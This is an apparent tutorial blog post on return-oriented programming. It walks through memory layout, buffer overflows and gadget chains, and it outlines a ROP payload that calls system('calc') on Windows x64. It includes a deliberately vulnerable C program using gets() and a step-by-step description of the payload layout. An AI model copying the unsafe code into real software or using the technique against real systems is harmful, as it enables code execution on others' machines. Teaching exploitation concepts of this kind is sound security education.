Hacking with a Single Command: The Art of Return-Oriented Programming |

Translate: 🇫🇷 French 🇸🇦 Arabic 🇨🇳 Chinese 🇪🇸 Spanish

Imagine a system being compromised by a single command.

You might look at it and say, “It’s just defining a numeric variable.” How can one line of code hack a system?

This is about Concealing Abstraction versus Fundamental Abstraction. And how we can hack a system using only one command.

I am sure 98% of programmers will tell you, “This is a constant, and a constant cannot be changed.” This is a widespread, but incorrect, belief.

Today, we break this fact. We will change the “unchangeable” constant and break the rules of the language.

By executing a simple command, we can launch the Calculator. We have controlled the processor completely. We executed commands the programmer never wrote.

The Modern Challenge: NX Bit

Previously, things were simple. Inject Shellcode into memory, execute it, and the system is hacked.

But modern systems have changed the game. Running code directly from memory is now almost impossible. This is thanks to technologies like the NX Bit, or “No-Execute”.

The rule is simple:

Memory that accepts writing prevents execution.
Memory that accepts execution prevents writing.

This law prevents us from injecting and running our own malicious code. So, how do we hack modern systems?

The “Ransom Note” Technique

In the world of crime, criminals hide their identity. One way is the “paper cutout” technique.

A criminal takes a newspaper and cuts out individual words. They assemble these words to form a threat letter. This avoids handwriting analysis and tracking.

They use something legal and natural—the newspaper—to create something malicious. This is the exact method hackers use in the ROP Chain technique.

ROP stands for Return-Oriented Programming. It relies on finding small fragments of existing code, called “Gadgets”. We chain these gadgets together to perform our attack.

But first, we must understand the memory structure.

Understanding Memory Layout

When you run a program, the system’s Loader takes the raw data from the hard disk (an .EXE or .ELF file). It loads this data into memory, giving the program the illusion that it has the entire memory to itself. This is Virtual Memory, and it’s divided into several key sections.

graph TD
    subgraph Process Memory
        A[Text Section<br/>(RX - Executable)]
        B[R-Data Section<br/>(R - Read-Only)]
        C[Data Section<br/>(RW - Initialized)]
        D[BSS Section<br/>(RW - Uninitialized)]
        E[Heap<br/>(Grows Up)]
        F[Shared Libraries<br/>(e.g., libc, kernel32.dll)]
        G[Stack<br/>(Grows Down)]
    end

    A --> B --> C --> D --> E --> F --> G

Text Section (.text): This is where the program’s actual code lives, turned into Machine Code. Its permissions are Read and Execute (RX). You cannot write to this area.
R-Data Section (.rodata): This holds Read-Only Data. Think const global variables and string literals like “Hello World”. You can only read from this section.
Data Section (.data): This stores initialized global variables, like int x = 10;.
BSS Section (.bss): This is for uninitialized global variables, like int x;. The system initializes them to zero.
Heap: This is the programmer’s playground for dynamic memory allocation using functions like malloc(). The Heap grows upwards toward higher memory addresses.
Shared Libraries: This is where libraries the program needs, like the C library (libc), are loaded. This area is critical for our Return-to-Libc attack.
Stack: This is where function information, local variables, and return addresses are stored. The Stack grows downwards toward lower memory addresses.

Where Does Everything Go?

Let’s look at a simple C code example to see this in action.

// Global variables
int x; // Uninitialized -> Stored in BSS
int y = 20; // Initialized -> Stored in Data
const int z = 30; // Constant -> Stored in R-Data

void main() {
    // Local variable
    int c = 40; // Stored on the Stack

    // Dynamic allocation
    int* ptr = (int*)malloc(sizeof(int)); // 'ptr' is on the Stack, the allocated 4 bytes are on the Heap

    // String literal
    printf("Hello World"); // "Hello World" is stored in R-Data
}

Understanding this layout is not just theoretical. When you do reverse engineering, every piece matters.

The Stack: The Battlefield

The Stack is a temporary storage area that works on the LIFO principle: Last-In, First-Out.

[!TIP] Think of a stack of plates. The last plate you put on top is the first one you take off.

PUSH: Adds a value to the top of the Stack.
POP: Removes the top value from the Stack.

The Stack is crucial for understanding Buffer Overflows and executing ROP attacks. Always remember: Stack = dishes.

Registers: The Processor’s Workbench

Registers are tiny, super-fast storage units located inside the processor. If RAM is the refrigerator, registers are the cutting board where the processor does its work.

There are two main types:

General-Purpose Registers (GPRs): Like RAX, RBX, RCX. We can use them for general calculations and data storage.
Special-Purpose Registers: These have specific jobs.
- RIP (Instruction Pointer): The “processor’s finger.” It points to the address of the next instruction to execute. Controlling this means controlling the program’s flow.
- RSP (Stack Pointer): Always points to the top of the stack.
- RBP (Base Pointer): Points to the base of the current function’s stack frame.

[!NOTE] In 64-bit architecture, registers start with R (e.g., RAX, RIP). In 32-bit, they start with E (e.g., EAX, EIP).

The Stack Frame: A Function’s Workspace

Every time a function is called, a workspace is reserved for it on the Stack. This is the Stack Frame.

It contains everything the function needs to operate and, crucially, to return safely.

graph TD
    direction BT
    subgraph Stack Frame (Grows Down)
        subgraph Higher Addresses
            A[Function Arguments]
            B[Return Address]
            C[Saved RBP (of previous frame)]
        end
        subgraph Lower Addresses
            D[Local Variables]
        end
    end
    A --> B --> C --> D

The most important part for us is the Return Address. After a function finishes, the processor looks at this address to know where to go next.

If we can overwrite this address, we can control the RIP. We can tell the processor to jump anywhere we want.

Buffer Overflow: The Entry Point

The Stack grows downwards, but when we write data to a buffer (like an array), the data fills upwards.

This creates a vulnerability.

Imagine a local variable, a character array (buffer), that’s 8 bytes long. If we write 16 bytes into it, we overflow the buffer. The extra bytes will overwrite whatever is next in the stack frame: other local variables, the saved RBP, and finally, the Return Address.

This is a Buffer Overflow. We exploit this overflow to seize control of the RIP.

#include <stdio.h>

void vulnerable_function() {
    char buffer[8]; // 8-byte buffer
    int secret = 42;
    printf("Enter your name: ");
    gets(buffer); // Unsafe function, allows overflow
}

int main() {
    vulnerable_function();
    return 0;
}

By providing more than 8 characters of input to gets(), we can overwrite the secret variable and then the return address on the stack.

Return-Oriented Programming (ROP) in Action

We’ve overwritten the return address. Now what? We can’t just point it to our own shellcode on the Stack because of the NX Bit.

So, we point it to a Gadget.

A gadget is a small sequence of existing code, already in an executable section (like .text or a shared library), that ends with a RET instruction.

The RET instruction is our glue. It does POP RIP. It pops the next value from the stack into the RIP register, effectively jumping to that address.

By carefully crafting a chain of gadget addresses on the stack, we can make the program do our bidding.

API vs. ABI: The Rules of Engagement

To call a function like system(), we can’t just jump to it. We have to follow the rules.

API (Application Programming Interface): The high-level contract. system("cmd"). Simple.
ABI (Application Binary Interface): The low-level contract. It defines how arguments are passed to functions.

For 64-bit systems:

Windows x64: The first argument goes into the RCX register.
Linux x64: The first argument goes into the RDI register.

So, to call system("cmd") on Windows, we need to get the address of the string “cmd” into RCX. How? With a gadget! We need to find a POP RCX; RET gadget.

The ROP Chain

Our attack plan is now clear:

Find a Buffer Overflow vulnerability to control the stack.
Find a POP RCX; RET gadget (for Windows).
Find the address of the system function.
Find the address of the string "cmd" (or "calc").
Construct the payload on the stack.

The payload will look like this:

Junk data to fill the buffer up to the return address.
Address of the POP RCX; RET gadget.
Address of the string "calc".
Address of the system function.

When the vulnerable function returns, it will POP the address of our first gadget into RIP. The processor jumps to POP RCX; RET. It pops the address of "calc" into RCX. Then it RETs again, popping the address of system into RIP. The processor jumps to system, which sees its argument ("calc") waiting in RCX and executes it.

Game over.

Concealing Abstraction: Finding Hidden Gadgets

Where do we find these gadgets? Sometimes, they are hiding in plain sight.

Consider this line of code: int score = 50009;

To a programmer, it’s a number. To a reverse engineer, it’s bytes.

50009 in hexadecimal is 0xC359. But due to Little Endian byte order on x86, it’s stored in memory as 59 C3.

0x59 is the machine code for POP RCX.
0xC3 is the machine code for RET.

The programmer unintentionally created a perfect POP RCX; RET gadget inside a data variable. This is Concealing Abstraction.

By jumping into the middle of the instruction that defines this variable, we can execute these bytes as code. This is called Misaligned Execution.

Deep Dive: Stack Alignment

There's a hidden trap in x64 exploitation: **Stack Alignment**. Some functions, especially those using SIMD instructions like `movaps`, require the stack pointer (`RSP`) to be 16-byte aligned (the address must end in `0`). A `CALL` instruction pushes an 8-byte return address, misaligning the stack. When we build a ROP chain, we might jump to `system` with a misaligned stack, causing a crash. The solution is simple: add an extra `RET` to the chain. The final chain becomes: 1. `POP RCX; RET` gadget 2. Argument (`"calc"` address) 3. **`RET` gadget (the alignment fix)** 4. `system` function address The extra `RET` pops 8 bytes, re-aligning the stack before the final jump to `system`.

The Final Payload

This is what we send to the program:

Padding: A string of characters to overflow the buffer and reach the return address.
Gadget 1 Address: The address of POP RCX; RET.
Argument: The address of the string "calc".
Gadget 2 Address: The address of a simple RET for stack alignment.
Function Address: The address of the system function.

We press Enter. The Calculator launches.

We have successfully bypassed modern security using the system’s own resources. Your knowledge is your only true weapon. If you understand the physics of the processor, you become self-sufficient. You can see the gadgets hiding behind the abstraction.